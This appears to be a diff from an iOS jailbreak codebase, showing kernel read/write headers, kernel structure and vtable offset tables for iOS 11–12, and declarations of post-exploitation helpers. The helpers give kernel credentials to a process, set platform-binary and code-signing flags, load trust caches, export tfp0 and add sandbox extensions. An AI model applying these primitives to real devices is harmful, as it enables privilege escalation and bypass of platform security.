|
||||
}
|
||||
|
||||
@@ -3,6 +3,7 @@
|
||||
|
||||
#include <mach/mach.h>
|
||||
#include <stdbool.h>
|
||||
#include <common.h>
|
||||
|
||||
/***** mach_vm.h *****/
|
||||
kern_return_t mach_vm_read(
|
||||
@@ -43,31 +44,46 @@ kern_return_t mach_vm_protect(
|
||||
boolean_t set_maximum,
|
||||
vm_prot_t new_protection);
|
||||
|
||||
kern_return_t mach_vm_remap(
|
||||
mach_port_name_t target,
|
||||
mach_vm_address_t *address,
|
||||
mach_vm_size_t size,
|
||||
mach_vm_offset_t mask,
|
||||
int flags,
|
||||
mach_port_name_t src_task,
|
||||
mach_vm_address_t src_address,
|
||||
boolean_t copy,
|
||||
vm_prot_t *cur_protection,
|
||||
vm_prot_t *max_protection,
|
||||
vm_inherit_t inheritance);
|
||||
|
||||
extern size_t kreads;
|
||||
extern size_t kwrites;
|
||||
extern mach_port_t tfp0;
|
||||
|
||||
size_t kread(uint64_t where, void* p, size_t size);
|
||||
size_t kwrite(uint64_t where, const void* p, size_t size);
|
||||
size_t kread(kptr_t where, void* p, size_t size);
|
||||
size_t kwrite(kptr_t where, const void* p, size_t size);
|
||||
|
||||
#define rk32(kaddr) ReadKernel32(kaddr)
|
||||
#define rk64(kaddr) ReadKernel64(kaddr)
|
||||
uint32_t ReadKernel32(uint64_t kaddr);
|
||||
uint64_t ReadKernel64(uint64_t kaddr);
|
||||
uint32_t ReadKernel32(kptr_t kaddr);
|
||||
uint64_t ReadKernel64(kptr_t kaddr);
|
||||
|
||||
#define wk32(kaddr, val) WriteKernel32(kaddr, val)
|
||||
#define wk64(kaddr, val) WriteKernel64(kaddr, val)
|
||||
void WriteKernel32(uint64_t kaddr, uint32_t val);
|
||||
void WriteKernel64(uint64_t kaddr, uint64_t val);
|
||||
bool WriteKernel32(kptr_t kaddr, uint32_t val);
|
||||
bool WriteKernel64(kptr_t kaddr, uint64_t val);
|
||||
|
||||
bool wkbuffer(uint64_t kaddr, void* buffer, size_t length);
|
||||
bool rkbuffer(uint64_t kaddr, void* buffer, size_t length);
|
||||
bool wkbuffer(kptr_t kaddr, void* buffer, size_t length);
|
||||
bool rkbuffer(kptr_t kaddr, void* buffer, size_t length);
|
||||
|
||||
void kmemcpy(uint64_t dest, uint64_t src, uint32_t length);
|
||||
|
||||
bool kmem_protect(uint64_t kaddr, uint32_t size, int prot);
|
||||
bool kmem_protect(kptr_t kaddr, uint32_t size, vm_prot_t prot);
|
||||
|
||||
uint64_t kmem_alloc(uint64_t size);
|
||||
uint64_t kmem_alloc_wired(uint64_t size);
|
||||
bool kmem_free(uint64_t kaddr, uint64_t size);
|
||||
kptr_t kmem_alloc(uint64_t size);
|
||||
kptr_t kmem_alloc_wired(uint64_t size);
|
||||
bool kmem_free(kptr_t kaddr, uint64_t size);
|
||||
|
||||
void prepare_rk_via_kmem_read_port(mach_port_t port);
|
||||
void prepare_rwk_via_tfp0(mach_port_t port);
|
||||
|
||||
@@ -1,9 +1,9 @@
|
||||
#ifndef KernelOffsets_h
|
||||
#define KernelOffsets_h
|
||||
|
||||
extern int* offsets;
|
||||
extern uint32_t* offsets;
|
||||
|
||||
enum kstruct_offset {
|
||||
enum kernel_offset {
|
||||
/* struct task */
|
||||
KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,
|
||||
KSTRUCT_OFFSET_TASK_REF_COUNT,
|
||||
@@ -16,6 +16,7 @@ enum kstruct_offset {
|
||||
KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_ADDR,
|
||||
KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_SIZE,
|
||||
KSTRUCT_OFFSET_TASK_TFLAGS,
|
||||
KSTRUCT_OFFSET_TASK_LOCK,
|
||||
|
||||
/* struct ipc_port */
|
||||
KSTRUCT_OFFSET_IPC_PORT_IO_BITS,
|
||||
@@ -34,6 +35,12 @@ enum kstruct_offset {
|
||||
KSTRUCT_OFFSET_PROC_TASK,
|
||||
KSTRUCT_OFFSET_PROC_UCRED,
|
||||
KSTRUCT_OFFSET_PROC_P_LIST,
|
||||
KSTRUCT_OFFSET_PROC_P_CSFLAGS,
|
||||
KSTRUCT_OFFSET_PROC_P_MEMSTAT_STATE,
|
||||
KSTRUCT_OFFSET_PROC_MLOCK,
|
||||
KSTRUCT_OFFSET_PROC_UCRED_MLOCK,
|
||||
KSTRUCT_OFFSET_PROC_SVUID,
|
||||
KSTRUCT_OFFSET_PROC_SVGID,
|
||||
|
||||
/* struct filedesc */
|
||||
KSTRUCT_OFFSET_FILEDESC_FD_OFILES,
|
||||
@@ -66,17 +73,52 @@ enum kstruct_offset {
|
||||
/* struct mount */
|
||||
KSTRUCT_OFFSET_MOUNT_MNT_FLAG,
|
||||
KSTRUCT_OFFSET_MOUNT_MNT_DATA,
|
||||
KSTRUCT_OFFSET_MOUNT_MNT_MLOCK,
|
||||
|
||||
/* struct host */
|
||||
KSTRUCT_OFFSET_HOST_SPECIAL,
|
||||
|
||||
/* struct ucred */
|
||||
KSTRUCT_OFFSET_UCRED_CR_UID,
|
||||
KSTRUCT_OFFSET_UCRED_CR_RUID,
|
||||
KSTRUCT_OFFSET_UCRED_CR_SVUID,
|
||||
KSTRUCT_OFFSET_UCRED_CR_NGROUPS,
|
||||
KSTRUCT_OFFSET_UCRED_CR_GROUPS,
|
||||
KSTRUCT_OFFSET_UCRED_CR_RGID,
|
||||
KSTRUCT_OFFSET_UCRED_CR_SVGID,
|
||||
KSTRUCT_OFFSET_UCRED_CR_GMUID,
|
||||
KSTRUCT_OFFSET_UCRED_CR_FLAGS,
|
||||
KSTRUCT_OFFSET_UCRED_CR_LABEL,
|
||||
|
||||
/* struct label */
|
||||
KSTRUCT_OFFSET_LABEL_L_FLAGS,
|
||||
KSTRUCT_OFFSET_LABEL_L_PERPOLICY,
|
||||
|
||||
/* struct ipc_entry */
|
||||
KSTRUCT_SIZE_IPC_ENTRY,
|
||||
KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS,
|
||||
|
||||
/* vtable OSDictionary */
|
||||
KVTABLE_OFFSET_OSDICTIONARY_SETOBJECTWITHCHARP,
|
||||
KVTABLE_OFFSET_OSDICTIONARY_GETOBJECTWITHCHARP,
|
||||
KVTABLE_OFFSET_OSDICTIONARY_MERGE,
|
||||
|
||||
/* vtable OSArray */
|
||||
KVTABLE_OFFSET_OSARRAY_MERGE,
|
||||
KVTABLE_OFFSET_OSARRAY_REMOVEOBJECT,
|
||||
KVTABLE_OFFSET_OSARRAY_GETOBJECT,
|
||||
|
||||
/* vtable OSObject */
|
||||
KVTABLE_OFFSET_OSOBJECT_RELEASE,
|
||||
KVTABLE_OFFSET_OSOBJECT_GETRETAINCOUNT,
|
||||
KVTABLE_OFFSET_OSOBJECT_RETAIN,
|
||||
|
||||
/* vtable OSString */
|
||||
KVTABLE_OFFSET_OSSTRING_GETLENGTH,
|
||||
|
||||
KFREE_ADDR_OFFSET,
|
||||
};
|
||||
|
||||
int koffset(enum kstruct_offset offset);
|
||||
uint32_t koffset(enum kernel_offset offset);
|
||||
|
||||
#endif
|
||||
@@ -6,13 +6,13 @@
|
||||
#include <sys/sysctl.h>
|
||||
#include <sys/utsname.h>
|
||||
|
||||
#include "KernelStructureOffsets.h"
|
||||
#include "KernelOffsets.h"
|
||||
#include <common.h>
|
||||
#include "utils.h"
|
||||
|
||||
int* offsets = NULL;
|
||||
uint32_t* offsets = NULL;
|
||||
|
||||
int kstruct_offsets_11_0[] = {
|
||||
uint32_t kernel_offsets_11_0[] = {
|
||||
0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE
|
||||
0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT
|
||||
0x14, // KSTRUCT_OFFSET_TASK_ACTIVE
|
||||
@@ -24,6 +24,7 @@ int kstruct_offsets_11_0[] = {
|
||||
0x3a8, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_ADDR
|
||||
0x3b0, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_SIZE
|
||||
0x3a0, // KSTRUCT_OFFSET_TASK_TFLAGS
|
||||
0x0, // KSTRUCT_OFFSET_TASK_LOCK
|
||||
|
||||
0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS
|
||||
0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES
|
||||
@@ -39,7 +40,13 @@ int kstruct_offsets_11_0[] = {
|
||||
0x108, // KSTRUCT_OFFSET_PROC_P_FD
|
||||
0x18, // KSTRUCT_OFFSET_PROC_TASK
|
||||
0x100, // KSTRUCT_OFFSET_PROC_UCRED
|
||||
0x8, // KSTRUCT_OFFSET_PROC_P_LIST
|
||||
0x0, // KSTRUCT_OFFSET_PROC_P_LIST
|
||||
0x2a8, // KSTRUCT_OFFSET_PROC_P_CSFLAGS
|
||||
0x410, // KSTRUCT_OFFSET_PROC_P_MEMSTAT_STATE
|
||||
0x58, // KSTRUCT_OFFSET_PROC_MLOCK
|
||||
0xf0, // KSTRUCT_OFFSET_PROC_UCRED_MLOCK
|
||||
0x40, // KSTRUCT_OFFSET_PROC_SVUID
|
||||
0x44, // KSTRUCT_OFFSET_PROC_SVGID
|
||||
|
||||
0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
|
||||
|
||||
@@ -63,16 +70,45 @@ int kstruct_offsets_11_0[] = {
|
||||
|
||||
0x70, // KSTRUCT_OFFSET_MOUNT_MNT_FLAG
|
||||
0x8f8, // KSTRUCT_OFFSET_MOUNT_MNT_DATA
|
||||
0x18, // KSTRUCT_OFFSET_MOUNT_MNT_MLOCK
|
||||
|
||||
0x10, // KSTRUCT_OFFSET_HOST_SPECIAL
|
||||
|
||||
0x18, // KSTRUCT_OFFSET_UCRED_CR_UID
|
||||
0x1c, // KSTRUCT_OFFSET_UCRED_CR_RUID
|
||||
0x20, // KSTRUCT_OFFSET_UCRED_CR_SVUID
|
||||
0x24, // KSTRUCT_OFFSET_UCRED_CR_NGROUPS
|
||||
0x28, // KSTRUCT_OFFSET_UCRED_CR_GROUPS
|
||||
0x68, // KSTRUCT_OFFSET_UCRED_CR_RGID
|
||||
0x6c, // KSTRUCT_OFFSET_UCRED_CR_SVGID
|
||||
0x70, // KSTRUCT_OFFSET_UCRED_CR_GMUID
|
||||
0x74, // KSTRUCT_OFFSET_UCRED_CR_FLAGS
|
||||
0x78, // KSTRUCT_OFFSET_UCRED_CR_LABEL
|
||||
|
||||
0x0, // KSTRUCT_OFFSET_LABEL_L_FLAGS
|
||||
0x8, // KSTRUCT_OFFSET_LABEL_L_PERPOLICY
|
||||
|
||||
0x18, // KSTRUCT_SIZE_IPC_ENTRY
|
||||
0x8, // KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS
|
||||
|
||||
0x1F, // KVTABLE_OFFSET_OSDICTIONARY_SETOBJECTWITHCHARP
|
||||
0x26, // KVTABLE_OFFSET_OSDICTIONARY_GETOBJECTWITHCHARP
|
||||
0x23, // KVTABLE_OFFSET_OSDICTIONARY_MERGE
|
||||
|
||||
0x1E, // KVTABLE_OFFSET_OSARRAY_MERGE
|
||||
0x20, // KVTABLE_OFFSET_OSARRAY_REMOVEOBJECT
|
||||
0x22, // KVTABLE_OFFSET_OSARRAY_GETOBJECT
|
||||
|
||||
0x05, // KVTABLE_OFFSET_OSOBJECT_RELEASE
|
||||
0x03, // KVTABLE_OFFSET_OSOBJECT_GETRETAINCOUNT
|
||||
0x04, // KVTABLE_OFFSET_OSOBJECT_RETAIN
|
||||
|
||||
0x11, // KVTABLE_OFFSET_OSSTRING_GETLENGTH
|
||||
|
||||
0x6c, // KFREE_ADDR_OFFSET
|
||||
};
|
||||
|
||||
int kstruct_offsets_11_3[] = {
|
||||
uint32_t kernel_offsets_11_3[] = {
|
||||
0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE
|
||||
0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT
|
||||
0x14, // KSTRUCT_OFFSET_TASK_ACTIVE
|
||||
@@ -84,6 +120,7 @@ int kstruct_offsets_11_3[] = {
|
||||
0x3a8, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_ADDR
|
||||
0x3b0, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_SIZE
|
||||
0x3a0, // KSTRUCT_OFFSET_TASK_TFLAGS
|
||||
0x0, // KSTRUCT_OFFSET_TASK_LOCK
|
||||
|
||||
0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS
|
||||
0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES
|
||||
@@ -99,7 +136,13 @@ int kstruct_offsets_11_3[] = {
|
||||
0x108, // KSTRUCT_OFFSET_PROC_P_FD
|
||||
0x18, // KSTRUCT_OFFSET_PROC_TASK
|
||||
0x100, // KSTRUCT_OFFSET_PROC_UCRED
|
||||
0x8, // KSTRUCT_OFFSET_PROC_P_LIST
|
||||
0x0, // KSTRUCT_OFFSET_PROC_P_LIST
|
||||
0x2a8, // KSTRUCT_OFFSET_PROC_P_CSFLAGS
|
||||
0x410, // KSTRUCT_OFFSET_PROC_P_MEMSTAT_STATE
|
||||
0x58, // KSTRUCT_OFFSET_PROC_MLOCK
|
||||
0xf0, // KSTRUCT_OFFSET_PROC_UCRED_MLOCK
|
||||
0x40, // KSTRUCT_OFFSET_PROC_SVUID
|
||||
0x44, // KSTRUCT_OFFSET_PROC_SVGID
|
||||
|
||||
0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
|
||||
|
||||
@@ -123,16 +166,45 @@ int kstruct_offsets_11_3[] = {
|
||||
|
||||
0x70, // KSTRUCT_OFFSET_MOUNT_MNT_FLAG
|
||||
0x8f8, // KSTRUCT_OFFSET_MOUNT_MNT_DATA
|
||||
0x18, // KSTRUCT_OFFSET_MOUNT_MNT_MLOCK
|
||||
|
||||
0x10, // KSTRUCT_OFFSET_HOST_SPECIAL
|
||||
|
||||
0x18, // KSTRUCT_OFFSET_UCRED_CR_UID
|
||||
0x1c, // KSTRUCT_OFFSET_UCRED_CR_RUID
|
||||
0x20, // KSTRUCT_OFFSET_UCRED_CR_SVUID
|
||||
0x24, // KSTRUCT_OFFSET_UCRED_CR_NGROUPS
|
||||
0x28, // KSTRUCT_OFFSET_UCRED_CR_GROUPS
|
||||
0x68, // KSTRUCT_OFFSET_UCRED_CR_RGID
|
||||
0x6c, // KSTRUCT_OFFSET_UCRED_CR_SVGID
|
||||
0x70, // KSTRUCT_OFFSET_UCRED_CR_GMUID
|
||||
0x74, // KSTRUCT_OFFSET_UCRED_CR_FLAGS
|
||||
0x78, // KSTRUCT_OFFSET_UCRED_CR_LABEL
|
||||
|
||||
0x7c, // KFREE_ADDR_OFFSET
|
||||
0x0, // KSTRUCT_OFFSET_LABEL_L_FLAGS
|
||||
0x8, // KSTRUCT_OFFSET_LABEL_L_PERPOLICY
|
||||
|
||||
0x18, // KSTRUCT_SIZE_IPC_ENTRY
|
||||
0x8, // KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS
|
||||
|
||||
0x1F, // KVTABLE_OFFSET_OSDICTIONARY_SETOBJECTWITHCHARP
|
||||
0x26, // KVTABLE_OFFSET_OSDICTIONARY_GETOBJECTWITHCHARP
|
||||
0x23, // KVTABLE_OFFSET_OSDICTIONARY_MERGE
|
||||
|
||||
0x1E, // KVTABLE_OFFSET_OSARRAY_MERGE
|
||||
0x20, // KVTABLE_OFFSET_OSARRAY_REMOVEOBJECT
|
||||
0x22, // KVTABLE_OFFSET_OSARRAY_GETOBJECT
|
||||
|
||||
0x05, // KVTABLE_OFFSET_OSOBJECT_RELEASE
|
||||
0x03, // KVTABLE_OFFSET_OSOBJECT_GETRETAINCOUNT
|
||||
0x04, // KVTABLE_OFFSET_OSOBJECT_RETAIN
|
||||
|
||||
0x11, // KVTABLE_OFFSET_OSSTRING_GETLENGTH
|
||||
|
||||
0x6c, // KFREE_ADDR_OFFSET
|
||||
};
|
||||
|
||||
int kstruct_offsets_12_0[] = {
|
||||
uint32_t kernel_offsets_12_0[] = {
|
||||
0xb, // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE
|
||||
0x10, // KSTRUCT_OFFSET_TASK_REF_COUNT
|
||||
0x14, // KSTRUCT_OFFSET_TASK_ACTIVE
|
||||
@@ -145,9 +217,22 @@ int kstruct_offsets_12_0[] = {
|
||||
#else
|
||||
0x358, // KSTRUCT_OFFSET_TASK_BSD_INFO
|
||||
#endif
|
||||
#if __arm64e__
|
||||
0x3a8, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_ADDR
|
||||
#else
|
||||
0x398, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_ADDR
|
||||
#endif
|
||||
#if __arm64e__
|
||||
0x3b0, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_SIZE
|
||||
#else
|
||||
0x3a0, // KSTRUCT_OFFSET_TASK_ALL_IMAGE_INFO_SIZE
|
||||
#endif
|
||||
#if __arm64e__
|
||||
0x400, // KSTRUCT_OFFSET_TASK_TFLAGS
|
||||
#else
|
||||
0x390, // KSTRUCT_OFFSET_TASK_TFLAGS
|
||||
#endif
|
||||
0x0, // KSTRUCT_OFFSET_TASK_LOCK
|
||||
|
||||
0x0, // KSTRUCT_OFFSET_IPC_PORT_IO_BITS
|
||||
0x4, // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES
|
||||
@@ -163,7 +248,13 @@ int kstruct_offsets_12_0[] = {
|
||||
0x108, // KSTRUCT_OFFSET_PROC_P_FD
|
||||
0x10, // KSTRUCT_OFFSET_PROC_TASK
|
||||
0xf8, // KSTRUCT_OFFSET_PROC_UCRED
|
||||
0x8, // KSTRUCT_OFFSET_PROC_P_LIST
|
||||
0x0, // KSTRUCT_OFFSET_PROC_P_LIST
|
||||
0x290, // KSTRUCT_OFFSET_PROC_P_CSFLAGS
|
||||
0x3f8, // KSTRUCT_OFFSET_PROC_P_MEMSTAT_STATE
|
||||
0x50, // KSTRUCT_OFFSET_PROC_MLOCK
|
||||
0xe8, // KSTRUCT_OFFSET_PROC_UCRED_MLOCK
|
||||
0x32, // KSTRUCT_OFFSET_PROC_SVUID
|
||||
0x36, // KSTRUCT_OFFSET_PROC_SVGID
|
||||
|
||||
0x0, // KSTRUCT_OFFSET_FILEDESC_FD_OFILES
|
||||
|
||||
@@ -187,32 +278,61 @@ int kstruct_offsets_12_0[] = {
|
||||
|
||||
0x70, // KSTRUCT_OFFSET_MOUNT_MNT_FLAG
|
||||
0x8f8, // KSTRUCT_OFFSET_MOUNT_MNT_DATA
|
||||
0x18, // KSTRUCT_OFFSET_MOUNT_MNT_MLOCK
|
||||
|
||||
0x10, // KSTRUCT_OFFSET_HOST_SPECIAL
|
||||
|
||||
0x18, // KSTRUCT_OFFSET_UCRED_CR_UID
|
||||
0x1c, // KSTRUCT_OFFSET_UCRED_CR_RUID
|
||||
0x20, // KSTRUCT_OFFSET_UCRED_CR_SVUID
|
||||
0x24, // KSTRUCT_OFFSET_UCRED_CR_NGROUPS
|
||||
0x28, // KSTRUCT_OFFSET_UCRED_CR_GROUPS
|
||||
0x68, // KSTRUCT_OFFSET_UCRED_CR_RGID
|
||||
0x6c, // KSTRUCT_OFFSET_UCRED_CR_SVGID
|
||||
0x70, // KSTRUCT_OFFSET_UCRED_CR_GMUID
|
||||
0x74, // KSTRUCT_OFFSET_UCRED_CR_FLAGS
|
||||
0x78, // KSTRUCT_OFFSET_UCRED_CR_LABEL
|
||||
|
||||
0x7c, // KFREE_ADDR_OFFSET
|
||||
0x0, // KSTRUCT_OFFSET_LABEL_L_FLAGS
|
||||
0x8, // KSTRUCT_OFFSET_LABEL_L_PERPOLICY
|
||||
|
||||
0x18, // KSTRUCT_SIZE_IPC_ENTRY
|
||||
0x8, // KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS
|
||||
|
||||
0x1F, // KVTABLE_OFFSET_OSDICTIONARY_SETOBJECTWITHCHARP
|
||||
0x26, // KVTABLE_OFFSET_OSDICTIONARY_GETOBJECTWITHCHARP
|
||||
0x23, // KVTABLE_OFFSET_OSDICTIONARY_MERGE
|
||||
|
||||
0x1E, // KVTABLE_OFFSET_OSARRAY_MERGE
|
||||
0x20, // KVTABLE_OFFSET_OSARRAY_REMOVEOBJECT
|
||||
0x22, // KVTABLE_OFFSET_OSARRAY_GETOBJECT
|
||||
|
||||
0x05, // KVTABLE_OFFSET_OSOBJECT_RELEASE
|
||||
0x03, // KVTABLE_OFFSET_OSOBJECT_GETRETAINCOUNT
|
||||
0x04, // KVTABLE_OFFSET_OSOBJECT_RETAIN
|
||||
|
||||
0x11, // KVTABLE_OFFSET_OSSTRING_GETLENGTH
|
||||
|
||||
0x6c, // KFREE_ADDR_OFFSET
|
||||
};
|
||||
|
||||
int koffset(enum kstruct_offset offset)
|
||||
uint32_t koffset(enum kernel_offset offset)
|
||||
{
|
||||
static dispatch_once_t onceToken;
|
||||
dispatch_once(&onceToken, ^{
|
||||
LOG("kCFCoreFoundationVersionNumber: %f", kCFCoreFoundationVersionNumber);
|
||||
if (kCFCoreFoundationVersionNumber >= 1535.12) {
|
||||
if (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0) {
|
||||
LOG("offsets selected for iOS 12.0 or above");
|
||||
offsets = kstruct_offsets_12_0;
|
||||
} else if (kCFCoreFoundationVersionNumber >= 1452.23) {
|
||||
offsets = kernel_offsets_12_0;
|
||||
} else if (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_11_3) {
|
||||
LOG("offsets selected for iOS 11.3 or above");
|
||||
offsets = kstruct_offsets_11_3;
|
||||
} else if (kCFCoreFoundationVersionNumber >= 1443.00) {
|
||||
offsets = kernel_offsets_11_3;
|
||||
} else if (kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_11_0) {
|
||||
LOG("offsets selected for iOS 11.0 to 11.2.6");
|
||||
offsets = kstruct_offsets_11_0;
|
||||
offsets = kernel_offsets_11_0;
|
||||
} else {
|
||||
LOG("iOS version too low, 11.0 required");
|
||||
exit(EXIT_FAILURE);
|
||||
offsets = NULL;
|
||||
}
|
||||
});
|
||||
if (offsets == NULL) {
|
||||
+1839
-62
File diff suppressed because it is too large
Load Diff
@@ -3,55 +3,165 @@
|
||||
|
||||
#include <common.h>
|
||||
#include <mach/mach.h>
|
||||
#include <offsetcache.h>
|
||||
#include <stdbool.h>
|
||||
|
||||
#define SETOFFSET(offset, val) (offs.offset = val)
|
||||
#define GETOFFSET(offset) offs.offset
|
||||
#if 0
|
||||
Credits:
|
||||
- https://stek29.rocks/2018/01/26/sandbox.html
|
||||
- https://stek29.rocks/2018/12/11/shenanigans.html
|
||||
- http://newosxbook.com/QiLin/qilin.pdf
|
||||
- https://github.com/Siguza/v0rtex/blob/e6d54c97715d6dbcdda8b9a8090484a7a47019d0/src/v0rtex.m#L1623
|
||||
#endif
|
||||
|
||||
typedef struct {
|
||||
kptr_t trustcache;
|
||||
kptr_t OSBoolean_True;
|
||||
kptr_t osunserializexml;
|
||||
kptr_t smalloc;
|
||||
kptr_t add_x0_x0_0x40_ret;
|
||||
kptr_t zone_map_ref;
|
||||
kptr_t vfs_context_current;
|
||||
kptr_t vnode_lookup;
|
||||
kptr_t vnode_put;
|
||||
kptr_t kernel_task;
|
||||
kptr_t shenanigans;
|
||||
kptr_t lck_mtx_lock;
|
||||
kptr_t lck_mtx_unlock;
|
||||
kptr_t apfs_jhash_getvnode;
|
||||
kptr_t vnode_get_snapshot;
|
||||
kptr_t fs_lookup_snapshot_metadata_by_name_and_return_name;
|
||||
kptr_t extension_create_file;
|
||||
kptr_t extension_add;
|
||||
kptr_t extension_release;
|
||||
kptr_t pmap_load_trust_cache;
|
||||
kptr_t kernproc;
|
||||
} offsets_t;
|
||||
#if 0
|
||||
TODO:
|
||||
- Patchfind proc_lock (High priority)
|
||||
- Patchfind proc_unlock (High priority)
|
||||
- Patchfind proc_ucred_lock (High priority)
|
||||
- Patchfind proc_ucred_unlock (High priority)
|
||||
- Patchfind vnode_lock (Low priority)
|
||||
- Patchfind vnode_unlock (Low priority)
|
||||
- Patchfind mount_lock (Low priority)
|
||||
- Patchfind mount_unlock (Low priority)
|
||||
- Patchfind task_set_platform_binary (High priority)
|
||||
- Patchfind kauth_cred_ref (Low priority)
|
||||
- Patchfind kauth_cred_unref (Low priority)
|
||||
- Patchfind chgproccnt (Low priority)
|
||||
- Patchfind kauth_cred_ref (Low priority)
|
||||
- Patchfind kauth_cred_unref (Low priority)
|
||||
- Patchfind extension_destroy (Low priority)
|
||||
- Patchfind extension_create_mach (Middle priority)
|
||||
- Use offsetof with XNU headers to find structure offsets (Low priority)
|
||||
- Update Unrestrict to implement the kernel calls
|
||||
#endif
|
||||
|
||||
extern offsets_t offs;
|
||||
extern uint64_t kernel_base;
|
||||
#define setoffset(offset, val) set_offset(#offset, val)
|
||||
#define getoffset(offset) get_offset(#offset)
|
||||
|
||||
#define OSBoolTrue getOSBool(true)
|
||||
#define OSBoolFalse getOSBool(false)
|
||||
|
||||
extern kptr_t kernel_base;
|
||||
extern uint64_t kernel_slide;
|
||||
|
||||
extern uint64_t cached_task_self_addr;
|
||||
extern bool found_offsets;
|
||||
extern kptr_t cached_task_self_addr;
|
||||
extern BOOL found_offsets;
|
||||
|
||||
uint64_t task_self_addr(void);
|
||||
uint64_t ipc_space_kernel(void);
|
||||
uint64_t find_kernel_base(void);
|
||||
kptr_t task_self_addr(void);
|
||||
kptr_t ipc_space_kernel(void);
|
||||
kptr_t find_kernel_base(void);
|
||||
|
||||
uint64_t current_thread(void);
|
||||
kptr_t current_thread(void);
|
||||
|
||||
mach_port_t fake_host_priv(void);
|
||||
|
||||
int message_size_for_kalloc_size(int kalloc_size);
|
||||
|
||||
uint64_t get_proc_struct_for_pid(pid_t pid);
|
||||
uint64_t get_address_of_port(pid_t pid, mach_port_t port);
|
||||
uint64_t get_kernel_cred_addr(void);
|
||||
uint64_t give_creds_to_process_at_addr(uint64_t proc, uint64_t cred_addr);
|
||||
void set_platform_binary(uint64_t proc);
|
||||
kptr_t get_kernel_proc_struct_addr(void);
|
||||
BOOL iterate_proc_list(void (^handler)(kptr_t, pid_t, BOOL *));
|
||||
kptr_t get_proc_struct_for_pid(pid_t pid);
|
||||
kptr_t get_address_of_port(pid_t pid, mach_port_t port);
|
||||
kptr_t get_kernel_cred_addr(void);
|
||||
kptr_t give_creds_to_process_at_addr(kptr_t proc, kptr_t cred_addr);
|
||||
BOOL set_platform_binary(kptr_t proc, BOOL set);
|
||||
|
||||
kptr_t zm_fix_addr(kptr_t addr);
|
||||
|
||||
BOOL verify_tfp0(void);
|
||||
|
||||
extern int (*pmap_load_trust_cache)(kptr_t kernel_trust, size_t length);
|
||||
int _pmap_load_trust_cache(kptr_t kernel_trust, size_t length);
|
||||
|
||||
BOOL set_host_type(host_t host, uint32_t type);
|
||||
BOOL export_tfp0(host_t host);
|
||||
BOOL unexport_tfp0(host_t host);
|
||||
|
||||
BOOL set_csflags(kptr_t proc, uint32_t flags, BOOL value);
|
||||
BOOL set_cs_platform_binary(kptr_t proc, BOOL value);
|
||||
|
||||
BOOL execute_with_credentials(kptr_t proc, kptr_t credentials, void (^function)(void));
|
||||
|
||||
uint32_t get_proc_memstat_state(kptr_t proc);
|
||||
BOOL set_proc_memstat_state(kptr_t proc, uint32_t memstat_state);
|
||||
BOOL set_proc_memstat_internal(kptr_t proc, BOOL set);
|
||||
BOOL get_proc_memstat_internal(kptr_t proc);
|
||||
size_t kstrlen(kptr_t ptr);
|
||||
kptr_t kstralloc(const char *str);
|
||||
BOOL kstrfree(kptr_t ptr);
|
||||
kptr_t sstrdup(const char *str);
|
||||
void sfree(kptr_t ptr);
|
||||
int extension_create_file(kptr_t saveto, kptr_t sb, const char *path, size_t path_len, uint32_t subtype);
|
||||
int extension_create_mach(kptr_t saveto, kptr_t sb, const char *name, uint32_t subtype);
|
||||
int extension_add(kptr_t ext, kptr_t sb, const char *desc);
|
||||
void extension_release(kptr_t ext);
|
||||
void extension_destroy(kptr_t ext);
|
||||
BOOL set_file_extension(kptr_t sandbox, const char *exc_key, const char *path);
|
||||
BOOL set_mach_extension(kptr_t sandbox, const char *exc_key, const char *name);
|
||||
kptr_t proc_find(pid_t pid);
|
||||
void proc_rele(kptr_t proc);
|
||||
void proc_lock(kptr_t proc);
|
||||
void proc_unlock(kptr_t proc);
|
||||
void proc_ucred_lock(kptr_t proc);
|
||||
void proc_ucred_unlock(kptr_t proc);
|
||||
void vnode_lock(kptr_t vp);
|
||||
void vnode_unlock(kptr_t vp);
|
||||
void mount_lock(kptr_t mp);
|
||||
void mount_unlock(kptr_t mp);
|
||||
void task_set_platform_binary(kptr_t task, boolean_t is_platform);
|
||||
void kauth_cred_ref(kptr_t cred);
|
||||
void kauth_cred_unref(kptr_t cred);
|
||||
int chgproccnt(uid_t uid, int diff);
|
||||
kptr_t vfs_context_current(void);
|
||||
int vnode_lookup(const char *path, int flags, kptr_t *vpp, kptr_t ctx);
|
||||
int vnode_put(kptr_t vp);
|
||||
BOOL OSDictionary_SetItem(kptr_t OSDictionary, const char *key, kptr_t val);
|
||||
kptr_t OSDictionary_GetItem(kptr_t OSDictionary, const char *key);
|
||||
BOOL OSDictionary_Merge(kptr_t OSDictionary, kptr_t OSDictionary2);
|
||||
uint32_t OSDictionary_ItemCount(kptr_t OSDictionary);
|
||||
kptr_t OSDictionary_ItemBuffer(kptr_t OSDictionary);
|
||||
kptr_t OSDictionary_ItemKey(kptr_t buffer, uint32_t idx);
|
||||
